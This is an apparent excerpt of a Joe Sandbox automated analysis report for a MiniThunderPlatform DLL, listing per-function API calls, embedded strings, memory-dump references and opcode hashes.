                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$CountPrivateProfileTick
                                                                                                                                              • String ID: adns_fail_cache$asyn_frame.dat$cache_millisec
                                                                                                                                              • API String ID: 875261409-2267470897
                                                                                                                                              • Opcode ID: c8ffa9debaa405051a1691433b0540c6b7523eea63a7f22bd3be2cb10d81e5c9
                                                                                                                                              • Instruction ID: 4830087f1f5d56f9a150c8e4268294c76c5af3baba40d567132b027825680130
                                                                                                                                              • Opcode Fuzzy Hash: c8ffa9debaa405051a1691433b0540c6b7523eea63a7f22bd3be2cb10d81e5c9
                                                                                                                                              • Instruction Fuzzy Hash: E72100754042909FD704CB14CD88B8BBBE4FB8D714F408A4CF84AC37A1D778A844CB52
                                                                                                                                              Function 10040240 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1004C3E0: RtlInitializeCriticalSection.NTDLL(?), ref: 1004C426
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 1004028D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100402A9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100402BF
                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100402D2
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(create event obj error!), ref: 100402E8
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B8AB0,?), ref: 1004030B
                                                                                                                                              Strings
                                                                                                                                              • create event obj error!, xrefs: 100402DF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$CreateCriticalEventExceptionInitializeSectionThrow
                                                                                                                                              • String ID: create event obj error!
                                                                                                                                              • API String ID: 1847905093-811451573
                                                                                                                                              • Opcode ID: 9109a391700c8ccc104fb45aaed8a5b1f35c6288a3c1f4e729edf3b290c5c33c
                                                                                                                                              • Instruction ID: 9cc5d498db5c7fe8a20a93d673084629e93b7db2985005051d1026fc3bf5f5bb
                                                                                                                                              • Opcode Fuzzy Hash: 9109a391700c8ccc104fb45aaed8a5b1f35c6288a3c1f4e729edf3b290c5c33c
                                                                                                                                              • Instruction Fuzzy Hash: 9121A9751047809FD320CFA4C888B9BBBE4FF98B04F50891DF58A87790DBB1A584CB52
                                                                                                                                              Function 10044066 Relevance: 12.2, APIs: 8, Instructions: 203networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1004406B
                                                                                                                                              • htons.WS2_32(?), ref: 100440E9
                                                                                                                                              • memcpy.MSVCR71(00000000,?,?), ref: 1004416B
                                                                                                                                              • htons.WS2_32(?), ref: 10044182
                                                                                                                                              • inet_addr.WS2_32(-00000004), ref: 1004423C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10044248
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 1004426B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 1004429B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$htons$H_prologinet_addrmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1534874130-0
                                                                                                                                              • Opcode ID: 1d396e316b0fc42f870b3eef96dc1b237f52712334a45e46399d535ce8c8e573
                                                                                                                                              • Instruction ID: 9c90d9c54cfddb96ad87de5e6c10a369b32581893d6a5593c88d9fff01ad9682
                                                                                                                                              • Opcode Fuzzy Hash: 1d396e316b0fc42f870b3eef96dc1b237f52712334a45e46399d535ce8c8e573
                                                                                                                                              • Instruction Fuzzy Hash: 2D813875900209DFCB14DFA4C984EEEBBB8FF48314F61852AF916E7251DB70AA44CB64
                                                                                                                                              Function 100A9200 Relevance: 12.1, APIs: 8, Instructions: 121COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A92B1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A92C3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?), ref: 100A930C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A931A
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A9339
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A9347
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100A936C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A937A
                                                                                                                                                • Part of subcall function 100D1799: __EH_prolog.LIBCMT ref: 100D179E
                                                                                                                                                • Part of subcall function 100D1799: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100A926F), ref: 100D17BF
                                                                                                                                                • Part of subcall function 100D1799: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,100A926F), ref: 100D17E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$?assign@?$basic_string@V12@V12@@$H_prologmalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2786945473-0
                                                                                                                                              • Opcode ID: d9fdefd42537f8b550a39bb395682d41986a67c311326dfe98ec87b34692043e
                                                                                                                                              • Instruction ID: e3db9a3cbca143fce2402fbdcee2bedbef05bd91d01f591ef4ccfc8d40667ea5
                                                                                                                                              • Opcode Fuzzy Hash: d9fdefd42537f8b550a39bb395682d41986a67c311326dfe98ec87b34692043e
                                                                                                                                              • Instruction Fuzzy Hash: 17515A75508341DFD314CF64C898B9BBBE8FB98750F104A1DF59A832A1DBB0A448CF92
                                                                                                                                              Function 10039640 Relevance: 12.1, APIs: 8, Instructions: 95COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001,00000000,00000000,?,?), ref: 10039669
                                                                                                                                                • Part of subcall function 100019A2: __EH_prolog.LIBCMT ref: 100019A7
                                                                                                                                                • Part of subcall function 100019A2: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP71(?,00000000,?,7C3CC1BB,?,10277CA8), ref: 10001B0B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000,?,?), ref: 1003969A
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 100396A5
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100396B4
                                                                                                                                                • Part of subcall function 101BC860: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,0000000E,?,?,00000000,?,100396CF), ref: 101BC885
                                                                                                                                                • Part of subcall function 1017EBC0: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,00000000,?,10311FB4,00000000,10055817,?,?,00000000,774D23A0,?,?,?,00000000,10245138), ref: 1017EBE5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100396FC
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 10039713
                                                                                                                                                • Part of subcall function 100392B0: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,00000000,?,?), ref: 100392E3
                                                                                                                                                • Part of subcall function 100392B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100392F5
                                                                                                                                                • Part of subcall function 100392B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10039325
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 10039737
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 10039775
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$V?$basic_string@$??$???1?$basic_string@D@1@@std@@D@2@@0@0@$?str@?$basic_stringstream@D@2@@2@D@std@@@std@@$??$?6??0?$basic_string@??0?$basic_stringstream@??6?$basic_ostream@?clear@ios_base@std@@D?$basic_stringstream@D@std@@@0@H_prologV01@V01@@V10@V?$basic_ostream@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1295690267-0
                                                                                                                                              • Opcode ID: d9b51d2d88036aad5f8f8e756a9373e9c1d33e7e05973336e1a745b6ccce354a
                                                                                                                                              • Instruction ID: 28b8b61647e6984404c96e6d56a1ae7cebf4f396d53a53ae089109537e2e6fad
                                                                                                                                              • Opcode Fuzzy Hash: d9b51d2d88036aad5f8f8e756a9373e9c1d33e7e05973336e1a745b6ccce354a
                                                                                                                                              • Instruction Fuzzy Hash: ED31C0325083909FD321DB54CC48B9BB7E8EBA9B11F000B2DF889872D0DB745908CBA3
                                                                                                                                              Function 100753F9 Relevance: 12.1, APIs: 8, Instructions: 75COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100753FE
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10075434
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007545C
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007546F
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075479
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075491
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100754BF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100754E5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?assign@?$basic_string@V12@$V12@@$??1?$basic_string@H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1493581078-0
                                                                                                                                              • Opcode ID: 5dd1af1d9ddafce26f62a2ec0bebc6894490056c7a4623e5a00a965a1d13d7aa
                                                                                                                                              • Instruction ID: 4fc214b235942c380add411db8cc1888adbd99cd323bb96fab9617295d3da80a
                                                                                                                                              • Opcode Fuzzy Hash: 5dd1af1d9ddafce26f62a2ec0bebc6894490056c7a4623e5a00a965a1d13d7aa
                                                                                                                                              • Instruction Fuzzy Hash: 8E311375501788DFCB25CF68C988BEABBF4BF18710F04465EE8AA93251DB70A944CB20
                                                                                                                                              Function 10038060 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 247COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(invalid map/set<T> iterator), ref: 1003808F
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 100380A1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100380BD
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B24A0), ref: 100380DA
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100382F6
                                                                                                                                              Strings
                                                                                                                                              • invalid map/set<T> iterator, xrefs: 10038086
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@??3@ExceptionThrowV01@@
                                                                                                                                              • String ID: invalid map/set<T> iterator
                                                                                                                                              • API String ID: 4098190477-152884079
                                                                                                                                              • Opcode ID: ca1e4bae6b6a22e69f1790565d54caba7422d35d46cd9ef12e65d862496dcc70
                                                                                                                                              • Instruction ID: 7da3ae295956b25448933cfffff3b02447314159fe9d450c3c013d71921d1bff
                                                                                                                                              • Opcode Fuzzy Hash: ca1e4bae6b6a22e69f1790565d54caba7422d35d46cd9ef12e65d862496dcc70
                                                                                                                                              • Instruction Fuzzy Hash: FDA17B742083818FC716CF28C4A0A56BBE5FF56245F6989DCE8954F312C771EE4ACBA1
                                                                                                                                              Function 10019176 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 226COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001917B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(invalid map/set<T> iterator,?,?), ref: 1001919A
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71(102B24A0), ref: 100191C0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100193D1
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100193D8
                                                                                                                                              Strings
                                                                                                                                              • invalid map/set<T> iterator, xrefs: 10019192
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@H_prolog$??0exception@@??1?$basic_string@??3@ExceptionThrowV01@@
                                                                                                                                              • String ID: invalid map/set<T> iterator
                                                                                                                                              • API String ID: 3264262834-152884079
                                                                                                                                              • Opcode ID: e98512b758acd1794490c0c23525a54fb50e5fc3c14b26c891a912a513f745c5
                                                                                                                                              • Instruction ID: 735f214222b3376b98e661e17ef82e2b8c6c5195e426eac30458e8fd067629d4
                                                                                                                                              • Opcode Fuzzy Hash: e98512b758acd1794490c0c23525a54fb50e5fc3c14b26c891a912a513f745c5
                                                                                                                                              • Instruction Fuzzy Hash: 65A13670908291AFD725CB64C094B98BFE2FF46344F29809DD9998F292D7B2ECC5CB50
                                                                                                                                              Function 10019711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 226COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10019716
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(invalid map/set<T> iterator,?,?,102768A4), ref: 10019735
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71 ref: 1001975B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,102768A4), ref: 1001996C
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 10019973
                                                                                                                                              Strings
                                                                                                                                              • invalid map/set<T> iterator, xrefs: 1001972D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@H_prolog$??0exception@@??1?$basic_string@??3@ExceptionThrowV01@@
                                                                                                                                              • String ID: invalid map/set<T> iterator
                                                                                                                                              • API String ID: 3264262834-152884079
                                                                                                                                              • Opcode ID: 18a3cbdd0f905a62e53045f924cd3ca3140af4b5bb54afc99ced22293c1f67a6
                                                                                                                                              • Instruction ID: 934e4a69c5983ee14dc4701616ce8d4edd983f705f610ce9dee54942593e48f5
                                                                                                                                              • Opcode Fuzzy Hash: 18a3cbdd0f905a62e53045f924cd3ca3140af4b5bb54afc99ced22293c1f67a6
                                                                                                                                              • Instruction Fuzzy Hash: 1AA13A74A082819FD741CF28C0D4B99BBE6EF46354FA9909CD48A4F6A2C771ECC5CB51
                                                                                                                                              Function 100B4110 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 160COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000001), ref: 100B4325
                                                                                                                                                • Part of subcall function 1007E380: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(00000000,00000000), ref: 1007E403
                                                                                                                                                • Part of subcall function 1007E380: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007E41A
                                                                                                                                                • Part of subcall function 1007E380: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007E485
                                                                                                                                                • Part of subcall function 1007E380: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?), ref: 1007E4FE
                                                                                                                                                • Part of subcall function 1007E380: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 1007E513
                                                                                                                                                • Part of subcall function 1007E380: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007E525
                                                                                                                                                • Part of subcall function 1007E380: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007E534
